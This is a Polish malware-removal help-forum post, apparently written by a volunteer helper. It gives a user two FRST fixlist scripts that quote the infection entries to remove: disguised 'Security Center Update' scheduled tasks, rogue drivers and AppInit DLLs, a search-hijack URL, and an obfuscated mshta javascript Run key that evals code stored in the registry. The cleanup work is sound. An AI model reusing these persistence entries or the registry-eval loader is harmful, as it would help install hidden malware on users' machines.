Witam
Otwórz notatnik systemowy i wklej:
Task: {17AACD91-F04B-42CB-843D-862982F1EE7A} - \Security Center Update - 3338532199 - No File ==== ATTENTION
Task: {18C585DA-6F1B-4F63-82BC-D2E06F087210} - System32\Tasks\ProtectPro = c:\programdata\{d84c79ba-da62-1a5e-d84c-c79bada6e6eb}\2551631669818428310b.exe ==== ATTENTION
Task: {2CAE76C5-B48C-48D3-9725-7A18DC1A77F1} - System32\Tasks\{42C94FEA-AB53-4E2E-9F85-C62106B4773A} = pcalua.exe -a C:\Users\Justyna\AppData\Roaming\sweet-page\UninstallManager.exe -c -ptid=sof
Task: {2F5E84A3-5274-4BCF-BB88-6F28E280E580} - System32\Tasks\{C1DC9FDD-AAF7-45CC-93BD-54B28DF0FFA9} = pcalua.exe -a C:\Users\Justyna\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor ==== ATTENTION
Task: {2FAF4089-0F6E-4733-AE89-7D38CEA8F419} - \Security Center Update - 3243284914 - No File ==== ATTENTION
Task: {30264A46-AA3B-4419-AA2F-E865CDA66807} - System32\Tasks\Bidaily Synchronize Task[973b] = c:\programdata\{640d034a-50cc-6849-640d-d034a50c0d29}\murphy's.law.of.love.e01.webrip.exe ==== ATTENTION
Task: {38B5521B-A241-4800-B29D-B7D54BD21F2D} - \Security Center Update - 3334281307 - No File ==== ATTENTION
Task: {4494FB3B-B839-4678-9CEE-75C0A5C17F2A} - System32\Tasks\{463CF58D-6652-4F15-91B9-CF0C8213521D} = Chrome.exe http://ui.skype.com/ui/0/6.0.0.120/pl/abandoninstall?page=tsBing
Task: {79ADBF41-4082-4434-8DED-E55453AECB31} - System32\Tasks\Security Center Update - 4187020142 = C:\Users\Justyna\AppData\Roaming\Akyvde\muqanoi.exe ==== ATTENTION
Task: {8418D9D4-618B-4CAE-9768-5DE8AD8DE12F} - System32\Tasks\QuickCompile = c:\programdata\{4575e389-26e6-dff2-4575-5e38926e8e24}\1357123297756836661b.exe ==== ATTENTION
Task: {94A2CE69-CFBE-4D72-8215-6F0C16CB83A3} - \Security Center Update - 580129234 - No File ==== ATTENTION
Task: {9DDCCF31-7C60-4775-8BD6-029C70D87AA7} - System32\Tasks\CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805} = C:\ProgramData\cisB47A.exe ==== ATTENTION
Task: {9F4BCF7B-4928-43CA-8E06-5A448C2F727B} - \Security Center Update - 2587336593 - No File ==== ATTENTION
Task: {C83AAAE3-6D80-4E86-8EB7-FAAF8C51C421} - System32\Tasks\Security Center Update - 426708800 = C:\Users\Justyna\AppData\Roaming\Xewoxu\pavuot.exe ==== ATTENTION
Task: {D1D42BF5-F3F3-4979-908E-8FAEEEC4974B} - System32\Tasks\FOBNFKRHFL1 = C:\ProgramData\SecurityUtility\SecurityUtility.exe ==== ATTENTION
Task: {E828CBD6-3068-47D1-B916-C746EBE486C2} - System32\Tasks\snp = C:\ProgramData\Nimzap\k0tdpk04.exe [2015-08-11] ()
Task: {F6E56698-148B-4E16-A707-CB418BCD8692} - System32\Tasks\PowerBooster = c:\programdata\{60074800-9fbc-173c-6007-748009fb2002}\2649204041121149254b.exe ==== ATTENTION
Task: {FABE74E7-05D4-4BA3-8AA1-C8C6FAB61119} - System32\Tasks\snf = C:\ProgramData\Nimzap\k0tdpk04.exe [2015-08-11] ()
Task: C:\windows\Tasks\Bidaily Synchronize Task[973b].job = c:\programdata\{640d034a-50cc-6849-640d-d034a50c0d29}\murphy's.law.of.love.e01.webrip.exe ==== ATTENTION
Task: C:\windows\Tasks\FOBNFKRHFL1.job = C:\ProgramData\SecurityUtility\SecurityUtility.exe ==== ATTENTION
Task: C:\windows\Tasks\PowerBooster.job = c:\programdata\{60074800-9fbc-173c-6007-748009fb2002}\2649204041121149254b.exe ==== ATTENTION
Task: C:\windows\Tasks\ProtectPro.job = c:\programdata\{d84c79ba-da62-1a5e-d84c-c79bada6e6eb}\2551631669818428310b.exe ==== ATTENTION
Task: C:\windows\Tasks\QuickCompile.job = c:\programdata\{4575e389-26e6-dff2-4575-5e38926e8e24}\1357123297756836661b.exe ==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 4187020142.job = C:\Users\Justyna\AppData\Roaming\Akyvde\muqanoi.exe ==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 426708800.job = C:\Users\Justyna\AppData\Roaming\Xewoxu\pavuot.exe ==== ATTENTION
HKLM\...\Run: [] = [X]
HKLM-x32\...\Run: [GrooveMonitor] = C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Software Update] = C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] = [X]
HKLM-x32\...\Run: [gmsd_pl_005010050] = [X]
HKLM-x32\...\Run: [gmsd_pl_005010051] = [X]
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\...\Run: [Akamai NetSession Interface] = C:\Users\Justyna\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-30] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\...\Run: [**67dec09e*] = mshta javascript:QfnxmLn6="Me";Cp7=new%20ActiveXObject("WScript.Shell");lhOlm9r="ldAl";A2ZDD=Cp7.RegRead("HKCU\\software\\615a03f7\\92317217");rQpYyo49="8";eval(A2ZDD);JnVlb0lJp="wq7I1joaD"; ===== ATTENTION (Value Name with invalid characters)
AppInit_DLLs: C:\ProgramData\Nimzap\bxhyak3y.dll = C:\ProgramData\Nimzap\bxhyak3y.dll [146944 2015-08-11] ()
AppInit_DLLs-x32: C:\ProgramData\Nimzap\mqwjv0k4.dll = C:\ProgramData\Nimzap\mqwjv0k4.dll [120320 2015-08-11] ()
ShellIconOverlayIdentifiers: [1SecureIconsProvider] - {FC9D8189-520A-4417-AED7-9EAC810C6FBA} = C:\ProgramData\Microsoft\Secure\Icons\SecureIconsProvider.dll No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] - {36A21736-36C2-4C11-8ACB-D4136F2B57BD} = No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
SearchScopes: HKLM-x32 - ielnksrch URL = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
SearchScopes: HKU\.DEFAULT - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2676438211-3974882995-393104745-1001 - {ielnksrch} URL = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdAz5t-sm61LnN_kTIKlZz_-SMiSJHrGKGSuNznpyS_C3m2KCHktipOX0DiKZVzijmrW7VzIzD-4FTHhfp7ltKAYD-YlAqqNqk5qjL45IdN1H04xb-M78tePfevYpsS_Y5ThUFh81rleHeKdq={searchTerms}
S2 jolugepba; C:\ProgramData\EroBisis\onuwci.exe [124880 2015-07-29] () [File not signed]
S2 kalghuir; C:\ProgramData\EroBisis\onuaci.exe [124880 2015-07-29] () [File not signed]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]
R2 Nimzap; C:\ProgramData\Nimzap\Nimzap [X]
S4 RsRavMon; "C:\Program Files (x86)\Rising\RAV\ravmond.exe" [X]
U3 axlicxit; C:\Windows\System32\Drivers\axlicxit.sys [0] (Microsoft Corporation) ==== ATTENTION (zero byte File/Folder)
S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X]
S1 fiwaqumi; \\C:\windows\system32\drivers\fiwaqumi.sys [X]
S1 genqvrzl; \\C:\windows\system32\drivers\genqvrzl.sys [X]
S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
S3 hwusb_cdcacm; system32\DRIVERS\ew_cdcacm.sys [X]
S3 hwusb_wwanecm; system32\DRIVERS\ew_wwanecm.sys [X]
S1 jzsycyqi; \\C:\windows\system32\drivers\jzsycyqi.sys [X]
S1 njrlpfem; \\C:\windows\system32\drivers\njrlpfem.sys [X]
S1 ppfd_vt_1_10_0_21; system32\drivers\ppfd_vt_1_10_0_21.sys [X]
S1 qsafd_vt_1_10_0_20; system32\drivers\qsafd_vt_1_10_0_20.sys [X]
S1 qtsbmfjh; \\C:\windows\system32\drivers\qtsbmfjh.sys [X]
S1 rfbgofmk; \\C:\windows\system32\drivers\rfbgofmk.sys [X]
S1 rsnwggmp; \\C:\windows\system32\drivers\rsnwggmp.sys [X]
S1 tcfd_vt_1_10_0_21; system32\drivers\tcfd_vt_1_10_0_21.sys [X]
S1 tznlhqcn; \\C:\windows\system32\drivers\tznlhqcn.sys [X]
S3 vdrive; system32\DRIVERS\vdrive.sys [X]
S1 whodomkk; \\C:\windows\system32\drivers\whodomkk.sys [X]
2015-08-11 13:05 - 2015-08-11 13:05 - 00003512 _____ C:\windows\System32\Tasks\snp
2015-08-11 13:05 - 2015-08-11 13:05 - 00003150 _____ C:\windows\System32\Tasks\snf
2015-08-11 13:04 - 2015-08-11 13:05 - 00000000 ____ D C:\ProgramData\Nimzaps
2015-08-11 13:03 - 2015-08-11 20:28 - 00000000 ____ D C:\ProgramData\Nimzap
2015-08-11 13:03 - 2015-08-11 13:03 - 03386091 _____ (Dongphase) C:\Program Files\Common Files\dk5pajgv.exe
2015-08-11 13:02 - 2015-08-11 13:02 - 00000000 ____ D C:\Program Files\Common Files\gqw35yhh
2015-08-01 22:29 - 2015-08-01 22:29 - 00003102 _____ C:\windows\System32\Tasks\{AA51465D-EF03-4886-A00A-CB6BF7E40805}
2015-08-11 20:25 - 2014-11-11 11:23 - 00000000 ____ D C:\AdwCleaner
2015-08-11 13:03 - 2015-08-11 13:03 - 3386091 _____ (Dongphase) C:\Program Files\Common Files\dk5pajgv.exe
2015-08-01 19:33 - 2015-08-01 19:32 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsj4DC7.tmp
2015-08-05 09:48 - 2015-08-05 09:48 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsl4320.tmp
2015-07-31 21:34 - 2015-07-31 21:34 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsm56DB.tmp
2015-08-01 23:06 - 2015-08-01 23:06 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nst5D5E.tmp
2015-08-01 09:54 - 2015-08-01 09:54 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsu94AC.tmp
2015-08-04 09:47 - 2015-08-04 09:47 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nsy468.tmp
2015-08-01 23:51 - 2015-08-01 23:51 - 0613255 _____ (CMI Limited) C:\Users\Justyna\AppData\Local\nszC26C.tmp
EmptyTemp:
Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
Przeskanuj programem Malwarebytes Anti-Malware https://www.malwarebytes.org/downloads/
Pokaż nowy log z FRST bez Addition.
Witam,
Otwórz notatnik systemowy i wklej:
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-2676438211-3974882995-393104745-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
FF Plugin: @iqiyi.com/npWebPlayer - C:\IQIYI Video\LStyle\npWebPlayer.dll [No File]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - https://clients2.google.com/service/update2/crx
U3 a2o2duqd; C:\Windows\System32\Drivers\a2o2duqd.sys [0] (Microsoft Corporation) ==== ATTENTION (zero byte File/Folder)
2015-04-19 14:20 - 2015-08-12 11:32 - 0000626 ____ N () C:\Users\Justyna\AppData\Roaming\2jgPjH6SdsfuOaXaijwSqafN
DeleteQuarantine:
Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.